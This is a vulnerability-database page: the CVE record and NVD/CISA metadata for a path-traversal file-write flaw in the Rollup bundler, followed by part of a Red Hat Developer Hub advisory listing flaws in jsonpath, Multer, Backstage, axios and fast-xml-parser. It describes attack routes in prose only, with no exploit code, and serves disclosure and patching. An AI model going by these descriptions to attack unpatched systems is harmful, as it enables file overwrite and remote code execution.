CVE-2026-27606 (GCVE-0-2026-27606)
Vulnerability from cvelistv5 – Published: 2026-02-25 02:08 – Updated: 2026-02-25 20:10
VLAI?
Title
Rollup 4 has Arbitrary File Write via Path Traversal
Summary
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
Severity ?
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-27606",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-25T20:09:59.552224Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-25T20:10:29.816Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "rollup",
"vendor": "rollup",
"versions": [
{
"status": "affected",
"version": "\u003c 2.80.0"
},
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.30.0"
},
{
"status": "affected",
"version": "\u003e= 4.0.0, \u003c 4.59.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-25T02:08:06.682Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
},
{
"name": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"name": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"name": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"name": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
}
],
"source": {
"advisory": "GHSA-mw96-cpmx-2vgc",
"discovery": "UNKNOWN"
},
"title": "Rollup 4 has Arbitrary File Write via Path Traversal"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-27606",
"datePublished": "2026-02-25T02:08:06.682Z",
"dateReserved": "2026-02-20T19:43:14.602Z",
"dateUpdated": "2026-02-25T20:10:29.816Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-27606\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-25T03:16:04.603\",\"lastModified\":\"2026-02-25T16:05:11.063\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"2.80.0\",\"matchCriteriaId\":\"3B082000-6A3D-4F24-87C3-CE2B4D66BE3E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.30.0\",\"matchCriteriaId\":\"26A20C56-5C17-468B-A026-2299D1BE909D\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"4.0.0\",\"versionEndExcluding\":\"4.59.0\",\"matchCriteriaId\":\"5BC2165D-030E-46E5-BA3D-DABB9B58E6FC\"}]}]}],\"references\":[{\"url\":\"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v2.80.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v3.30.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/releases/tag/v4.59.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-27606\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-25T20:09:59.552224Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-25T20:10:18.661Z\"}}], \"cna\": {\"title\": \"Rollup 4 has Arbitrary File Write via Path Traversal\", \"source\": {\"advisory\": \"GHSA-mw96-cpmx-2vgc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"rollup\", \"product\": \"rollup\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.80.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.30.0\"}, {\"status\": \"affected\", \"version\": \"\u003e= 4.0.0, \u003c 4.59.0\"}]}], \"references\": [{\"url\": \"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\", \"name\": \"https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\", \"name\": \"https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\", \"name\": \"https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\", \"name\": \"https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v2.80.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v2.80.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v3.30.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v3.30.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/rollup/rollup/releases/tag/v4.59.0\", \"name\": \"https://github.com/rollup/rollup/releases/tag/v4.59.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-25T02:08:06.682Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-27606\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-25T20:10:29.816Z\", \"dateReserved\": \"2026-02-20T19:43:14.602Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-25T02:08:06.682Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-27606
Vulnerability from fkie_nvd - Published: 2026-02-25 03:16 - Updated: 2026-02-25 16:05
Severity ?
Summary
Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "3B082000-6A3D-4F24-87C3-CE2B4D66BE3E",
"versionEndExcluding": "2.80.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "26A20C56-5C17-468B-A026-2299D1BE909D",
"versionEndExcluding": "3.30.0",
"versionStartIncluding": "3.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rollupjs:rollup:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "5BC2165D-030E-46E5-BA3D-DABB9B58E6FC",
"versionEndExcluding": "4.59.0",
"versionStartIncluding": "4.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Rollup is a module bundler for JavaScript. Versions prior to 2.80.0, 3.30.0, and 4.59.0 of the Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files. Versions 2.80.0, 3.30.0, and 4.59.0 contain a patch for the issue."
},
{
"lang": "es",
"value": "Rollup es un empaquetador de m\u00f3dulos para JavaScript. Las versiones anteriores a la 2.80.0, 3.30.0 y 4.59.0 del empaquetador de m\u00f3dulos Rollup (espec\u00edficamente v4.x y presente en el c\u00f3digo fuente actual) es vulnerable a una escritura de archivo arbitraria mediante salto de ruta. La sanitizaci\u00f3n insegura de nombres de archivo en el motor principal permite a un atacante controlar los nombres de archivo de salida (por ejemplo, mediante entradas con nombre de CLI, alias de fragmentos manuales o plugins maliciosos) y usar secuencias de salto (\u0027../\u0027) para sobrescribir archivos en cualquier lugar del sistema de archivos del host para el que el proceso de compilaci\u00f3n tenga permisos. Esto puede conducir a una ejecuci\u00f3n remota de c\u00f3digo (RCE) persistente al sobrescribir archivos de configuraci\u00f3n cr\u00edticos del sistema o del usuario. Las versiones 2.80.0, 3.30.0 y 4.59.0 contienen un parche para el problema."
}
],
"id": "CVE-2026-27606",
"lastModified": "2026-02-25T16:05:11.063",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "PROOF_OF_CONCEPT",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-25T03:16:04.603",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
RHSA-2026:6802
Vulnerability from csaf_redhat - Published: 2026-04-07 13:22 - Updated: 2026-04-10 15:10Summary
Red Hat Security Advisory: Red Hat Developer Hub 1.9.3 release.
Severity
Important
Notes
Topic: Red Hat Developer Hub 1.9.3 has been released.
Details: Red Hat Developer Hub (RHDH) is Red Hat's enterprise-grade, self-managed, customizable developer portal based on Backstage.io. RHDH is supported on OpenShift and other major Kubernetes clusters (AKS, EKS, GKE). The core features of RHDH include a single pane of glass, a centralized software catalog, self-service via golden path templates, and Tech Docs. RHDH is extensible by plugins.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in jsonpath. The `value` function is vulnerable to Prototype Pollution, a type of vulnerability that allows an attacker to inject or modify properties of an object's prototype. This can lead to various impacts, including arbitrary code execution, privilege escalation, or denial of service (DoS).
8.8 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.
A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component's reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.
9.8 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.
9.1 (Critical)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.
A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository's `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.
7.7 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.
7.1 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A denial of service flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted, small XML input. This input can force the XML parser to perform an unlimited amount of entity expansion, consuming excessive resources. This can lead to the application freezing for an extended period, resulting in a Denial of Service (DoS).
7.5 (High)
Vendor Fix
For more about Red Hat Developer Hub, see References links
https://access.redhat.com/errata/RHSA-2026:6802
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
